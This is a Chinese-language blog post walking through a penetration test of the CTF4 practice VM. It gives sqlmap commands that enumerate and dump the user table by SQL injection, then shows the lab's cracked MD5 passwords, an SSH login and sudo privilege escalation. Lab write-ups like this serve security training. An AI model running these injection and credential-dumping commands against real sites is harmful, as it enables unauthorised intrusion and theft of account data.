首页
小工具
IP查询API
UserAgent查询API
二维码生成API
在线文件转base64
Linux命令搜索
Myluzh Blog
CTF4靶机渗透测试笔记
发布时间: 2020-2-25 文章作者:
myluzh
分类名称:
SECURE
朗读文章
0x01初步探测
CTF4靶机导入虚拟机后,直接使用netdiscover命令扫描,找到靶机。
nmap命令扫描目标靶机端口,看看有哪些端口开放 可以看到80http 22ssh 25smtp端口开着
0x02查找漏洞
直接访问http地址,发现好像能sql注入
0x03 sql注入
sqlmap跑下数据库(其实没什么必要)
#sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --dbs
跑下数据表
#sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --tables
发现有个user表,直接跑user表字段
#
sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --columns -T "user"
直接爆用户跟密码
#sqlmap -u "http://192.168.1.108/index.html?page=blog&title=Blog&id=5" --dump -T "user" -C "user_id,user_name,user_pass"
sql注入利用完成,成功拿到账号密码
0x04账号利用
爆出来的用户密码可以看出都是md5加密的,前面几条密文解密要收费,免费的查出来了两条
用户dstevens密码02e823a15a392b5aa4ff4ccb9060fa68 (查询结果
ilike2surf
)
用户ghighland密码9f3eb3087298ff21843cc4e013cf355f (查询结果undone1)
dirb扫了下网站目录,有个admin目录,直接用上面爆出来的账号登陆进去,发现没上面用,只有一个文本框,测试了以下xss也是能触发成功的。但没什么用。
到此,我就没思路了,然后看了下writeup,原来直接拿账号密码登陆ssh,我竟然把这给忘,直接拿上面的账号密码登陆ssh,
用户dstevens密码
ilike2surf,
用户ghighland密码undone1
这两个都试了
,但是权限不够。
又看了一波writeup,原来直接用爆出来的第一个账号(账号
dstevens密码02e823a15a392b5aa4ff4ccb9060fa68 (解密ilike2surf)
),登陆后用sudo命令就是root权限了。谁叫我没钱给第一个密文解密呢。成功提权,结束。
0x05总结
靶机难度其实不高,但是渗透过程中也不是特别顺利,有点坑比如说用dirb扫出来很多东西,但是能利用的却没有,在这个上面浪费了时间,然后就是没想到这个密码直接能登陆ssh,ssh这里还是需要注意下的。
靶机下载magnet:?xt=urn:btih:E7567516ADC9617E8CB969F59BF3430EF514DEA6
标签:
渗透
靶机
ctf
版权声明:若无特殊注明,本文皆为
Myluzh Blog
原创,转载请保留文章出处。
文章标题:《
CTF4靶机渗透测试笔记
》
«
Linux grep命令 查找目录中文件的内容
|
VMware虚拟机三种网络模式:桥接模式,NAT模式,仅主机模式
»
取消回复
发表评论
昵称
邮件地址 (选填)
个人主页 (选填)
手机扫一扫访问
搜索内容
热门文章
VMware vCenter vSphere ESXi 7.0 许可证&下载链接
DS918+,DS3617xs黑群晖洗白码
黑群晖各版本引导下载
Kali Liunx下msfvenom利用方法
python base64加解密脚本(可变换码表)
Kali Liunx字典生成工具Crunch,Cupp,Cewl
解决VM虚拟机Kali Liunx连不上网
JIS-CTF-VulnUpload-CTF01靶机渗透测试笔记
最新文章
iptables 四表五链
关于Jenkins一些插件介绍
K8S 部署单节点EMQX4
关于NextCloud登录报错:Refused to send form data to '/login' because it violates the following Content Security Policy directive: "form-action 'self'".
K8S 删除命名空间一直卡在Terminating解决方案(移除finalizers,强制删除命名空间)
RKE2部署高可用K8S集群
GitOps:ArgoCD 部署与使用
在Nginx和Ingress-Nginx中配置WebSocket(WS/WSS)
最新评论
ID:
99
作者这个很有用
ID:
myluzh
@顶顶顶:https://www.ela...
ID:
顶顶顶
版本对应关系去哪看呢
ID:
冬天里的火
可以,现在弄k8s 的越来越多了,确实都...
友情链接
operatorhub.io
日期存档
2025年4月(1)
2025年3月(6)
2025年2月(5)
2025年1月(3)
2024年12月(2)
2024年11月(8)
2024年10月(8)
2024年9月(6)
2024年8月(2)
2024年7月(7)
2024年6月(1)
2024年5月(6)
2024年4月(1)
2024年3月(3)
2024年2月(6)
2024年1月(11)
2023年12月(13)
2023年11月(15)
2023年10月(8)
2023年9月(11)
2023年8月(4)
2023年7月(18)
2023年6月(16)
2023年5月(16)
2023年4月(4)
2023年3月(7)
2023年2月(26)
2023年1月(10)
2022年12月(7)
2022年11月(2)
2022年10月(5)
2022年9月(8)
2022年8月(9)
2022年7月(4)
2022年6月(3)
2022年5月(3)
2022年4月(3)
2022年3月(7)
2022年2月(1)
2022年1月(2)
2021年12月(6)
2021年11月(3)
2021年10月(5)
2021年9月(8)
2021年8月(3)
2021年7月(3)
2021年6月(3)
2021年5月(3)
2021年4月(4)
2021年3月(3)
2021年2月(1)
2021年1月(1)
2020年12月(8)
2020年11月(6)
2020年10月(1)
2020年9月(3)
2020年8月(1)
2020年7月(5)
2020年6月(1)
2020年5月(2)
2020年4月(7)
2020年3月(20)
2020年2月(12)
2020年1月(3)
2010年10月(3)
WeChat
发表评论